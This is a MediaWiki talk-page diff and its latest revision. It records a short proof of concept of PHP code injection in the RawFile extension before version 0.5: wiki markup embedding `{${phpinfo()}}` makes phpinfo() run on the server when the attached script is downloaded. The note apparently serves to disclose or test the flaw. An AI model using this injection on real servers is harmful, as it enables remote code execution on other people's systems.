Difference between revisions of "Talk:Mediawiki RawFile"
Jump to navigation
Jump to search
m |
|||
(2 intermediate revisions by one other user not shown) | |||
Line 1: | Line 1: | ||
+ | Testing PHP code injection on Rawfile < 0.5 : |
||
− | Tests... |
||
+ | <br>Adding this code to a wikipage: |
||
− | |||
+ | <pre> |
||
− | <nowiki>{${ |
+ | <nowiki><nowiki>{${phpinfo()}}</nowiki></nowiki> |
[{{#file: myscript.sh}} as myscript.sh] |
[{{#file: myscript.sh}} as myscript.sh] |
||
<source lang=bash> |
<source lang=bash> |
||
Line 9: | Line 10: | ||
exit 0 |
exit 0 |
||
</source> |
</source> |
||
+ | </pre> |
||
+ | and trying to download myscript.sh will execute phpinfo() on the server. |
Latest revision as of 16:03, 13 February 2014
Testing PHP code injection on Rawfile < 0.5 :
Adding this code to a wikipage:
<nowiki>{${phpinfo()}}</nowiki> [{{#file: myscript.sh}} as myscript.sh] <source lang=bash> #!/bin/bash echo 'Hello world!' exit 0 </source>
and trying to download myscript.sh will execute phpinfo() on the server.